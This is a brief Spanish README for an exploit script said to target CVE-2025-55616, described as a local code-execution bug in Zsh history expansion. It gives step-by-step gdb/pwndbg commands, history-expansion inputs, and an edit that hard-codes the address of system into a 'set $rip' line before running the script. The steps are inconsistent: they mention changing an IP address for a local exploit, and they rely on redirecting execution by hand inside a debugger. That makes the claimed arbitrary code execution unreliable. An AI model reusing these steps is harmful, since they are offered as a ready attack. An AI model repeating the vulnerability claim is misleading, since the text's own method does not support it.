
Exploit para CVE-2025-55616, un RCE local en Zsh mediante expresión de historial, que logra ejecución arbitraria de código con privilegios de usuario.
Para ejecutar este exploit: solo cambia la dirección IP y el "p system" en el exploit, porque también lo probé en mi segunda laptop, y para cambiarlo ejecuta el siguiente comando en gdb (especialmente en pwndbg):
$ gdb zsh -f (en la terminal)
pwndbg> run -f
username% ! (username será el tuyo, solo escribe ! )
username% !!11111111111 (aquí igual, solo escribe !!11111111111 )
pwndbg> p system
después de obtener la dirección de "p system", solo cámbiala en
b'set $rip = 0x7ffff7cc9110', (usa tu dirección de p system en lugar de 0x7ffff7cc9110
Esta vulnerabilidad permite a atacantes locales lograr Ejecución de Código Arbitrario (RCE) con los privilegios del usuario que ejecuta el proceso de Zsh.
python3 CVE-2025-55616.py